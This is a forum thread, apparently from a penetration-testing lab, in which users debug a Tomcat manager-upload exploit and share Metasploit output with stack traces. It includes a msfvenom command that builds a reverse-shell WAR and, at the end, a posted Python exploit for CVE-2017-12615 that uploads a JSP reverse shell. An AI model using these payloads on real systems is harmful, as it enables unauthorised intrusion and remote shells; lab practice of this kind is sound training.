Hi I was wondering if someone call tell me what I am doing wrong in the lab.

What I am doing is the following. I started a shell on the host that we have RDP access to. I upgraded the shell to a meterpreter session with msfconsole.
I completed host 2 and 3 through my own local machine within msfconsole through run autoroute 172.16.1.0/23

for the Host 1 I need to get a tomcat vulnerability for the mgr upload. I have setup the exploit and the handler, but msfconsole hangs on executing …
When I login manually through the webpage I can see the payload is uploaded, but I never get a repsonse back from the machine.
After a few minutes msfconsole times out.

If I run msfconsole on the rdp machine it instantly breaks after executing the upload

When I enable httptrace in metasploit I get the following response during the exploit:

[*] Executing EmRX9zHIfRN729ts…
####################

Request:

####################
GET /EmRX9zHIfRN729ts/jbVbamUcgsWMAiQAkbBXavD.jsp HTTP/1.1
Host: 172.16.1.11:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15

####################

Response:

####################
HTTP/1.1 500
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 5671
Date: Sun, 08 Jan 2023 21:53:58 GMT
Connection: close

<!doctype html>HTTP Status 500 – Internal Server Errorbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}

HTTP Status 500 – Internal Server Error

Type Exception Report

Message Error instantiating servlet class [metasploit.PayloadServlet]

Description The server encountered an unexpected condition that prevented it from fulfilling the request.

Exception

jakarta.servlet.ServletException: Error instantiating servlet class [metasploit.PayloadServlet]

org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)

org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)

org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)

org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)

org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)

org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)

org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)

org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)

org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)

org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)

org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)

org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)

java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.NoClassDefFoundError: javax/servlet/http/HttpServlet

java.lang.ClassLoader.defineClass1(Native Method)

java.lang.ClassLoader.defineClass(Unknown Source)

java.security.SecureClassLoader.defineClass(Unknown Source)

org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)

org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)

org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)

org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)

org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)

org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)

org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)

org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)

org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)

org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)

org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)

org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)

org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)

org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)

org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)

org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)

java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.ClassNotFoundException: javax.servlet.http.HttpServlet

org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1444)

org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)

java.lang.ClassLoader.defineClass1(Native Method)

java.lang.ClassLoader.defineClass(Unknown Source)

java.security.SecureClassLoader.defineClass(Unknown Source)

org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)

org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)

org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)

org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)

org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)

org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)

org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)

org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)

org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)

org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)

org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)

org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)

org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)

org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)

org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)

org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)

java.lang.Thread.run(Unknown Source)

Note The full stack trace of the root cause is available in the server logs.

Apache Tomcat/10.0.11

[-] Exploit aborted due to failure: unknown: Failed to execute the payload
[*] Exploit completed, but no session was created.

I have been suffering from a similar phenomenon for about a week.
I created war file with msfvenom and upload/deploy it.

$msfvenom -p java/shell_reverse_tcp lhost=172.16.1.5 lport=4444 -f war -o pwn.war
Payload size: 13322 bytes
Final size of war file: 13322 bytes
Saved as: pwn.war

However, when I click on it, I get the same error.
How can I eliminate this error and establish a session?

HTTP Status 500 – Internal Server Error

Type Exception Report

Message Error instantiating servlet class [metasploit.PayloadServlet]

Description The server encountered an unexpected condition that prevented it from fulfilling the request.

Exception

jakarta.servlet.ServletException: Error instantiating servlet class [metasploit.PayloadServlet]
	org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
	org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
	org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
	org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
	org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
	org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
	org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
	org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
	org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
	org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.NoClassDefFoundError: javax/servlet/http/HttpServlet
	java.lang.ClassLoader.defineClass1(Native Method)
	java.lang.ClassLoader.defineClass(Unknown Source)
	java.security.SecureClassLoader.defineClass(Unknown Source)
	org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)
	org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
	org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
	org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
	org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
	org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
	org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
	org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
	org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
	org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
	org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
	org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.ClassNotFoundException: javax.servlet.http.HttpServlet
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1444)
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
	java.lang.ClassLoader.defineClass1(Native Method)
	java.lang.ClassLoader.defineClass(Unknown Source)
	java.security.SecureClassLoader.defineClass(Unknown Source)
	org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)
	org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)
	org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
	org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
	org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
	org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
	org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
	org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
	org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
	org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
	org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
	org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
	org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	java.lang.Thread.run(Unknown Source)

Note The full stack trace of the root cause is available in the server logs.

I managed to do it after all, i did all the steps manually.
If you get the same error as I did or if it tries to connect constantly do all the steps manually dont rely on msfconsole

How??

Where are you stuck?

I could solve it in a manual way, I guess the problem was with my payload generated with msfvenom, instead of using -f war, for some reason I did a typo and was using “raw”.

I’m trying another method to see if works, exploiting a vuln Apache Tomcat JSP Upload Remote Code Execution (CVE-2017-12615), I built a Python code to exploit it, but I keep getting HTTP 405. If anyone else wants to give it a try, here’s my code:

#!/usr/bin/python

import http.client
import os

target_ip = “172.16.1.11”
target_port = 8080

print(“\033[92mGenerating JSP reverse shell\033[0m”)
os.system(“msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=4444 -f raw > shell.jsp”)

try:
with open(“shell.jsp”, “rb”) as f:
body = f.read()
except FileNotFoundError:
print(“\033[91mError: shell.jsp not found\033[0m”)
exit()
except Exception as e:
print(“\033[91mError:”, str(e), “\033[0m”)
exit()

conn = http.client.HTTPConnection(target_ip, target_port)

headers = {“Host”: “{}:{}”.format(target_ip, target_port),
“Accept-Language”: “en”,
“User-Agent”: “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)”,
“Connection”: “close”,
“Content-Type”: “application/x-www-form-urlencoded”}

try:
conn.request(“PUT”, “/shell.jsp”, body, headers)
r1 = conn.getresponse()
print(“\033[92m”, r1.status, r1.reason, “\033[0m”)
if r1.status == 204 or r1.status == 201:
conn.request(“GET”, “/shell.jsp”)
r2 = conn.getresponse()
print(“\033[92m”, r2.status, r2.reason, “\033[0m”)
except Exception as e:
print(“\033[91mError:”, str(e), “\033[0m”)